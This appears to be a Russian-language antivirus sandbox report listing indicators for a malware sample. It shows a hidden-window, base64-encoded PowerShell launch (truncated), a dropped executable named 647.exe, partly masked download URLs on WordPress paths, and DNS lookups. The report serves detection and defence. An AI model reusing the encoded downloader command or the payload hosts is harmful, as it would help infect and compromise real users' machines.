Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABiAGoAMwBYAGkAYQA2AD0AJwB2AGoASQBMAFMAVQAnADsAJABJAEUAawBvAFQANQAgAD0AIAAnADYANAA3ACcAOwAkAEUAcwBtAGIAbwA2AFcAVAA9ACcAcQB1AGkATABRAGYANwBWACcAOwAkAEcAdwA3AEkAegBGAG8AbgA9ACQAZQBuAHYAO...
- %HOMEPATH%\647.exe
- %HOMEPATH%\647.exe
- http://up##sl.com/wp-admin/x60/
- http://et###rsery.com/wp-includes/9nte5/
- http://ad####cademy.com/wp-content/0774/
- http://www.ad####cademy.com/wp-content/0774/
- DNS ASK up##sl.com
- DNS ASK et###rsery.com
- DNS ASK ad####cademy.com
- DNS ASK ka####neeglute.xyz
- DNS ASK wb####.archi-edge.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABiAGoAMwBYAGkAYQA2AD0AJwB2AGoASQBMAFMAVQAnADsAJABJAEUAawBvAFQANQAgAD0AIAAnADYANAA3ACcAOwAkAEUAcwBtAGIAbwA2AFcAVAA9ACcAcQB1AGkATABRAGYANwBWACcAOwAkAEcAdwA3AEkAegBGAG8AbgA9ACQAZQBuAHYAO...' (со скрытым окном)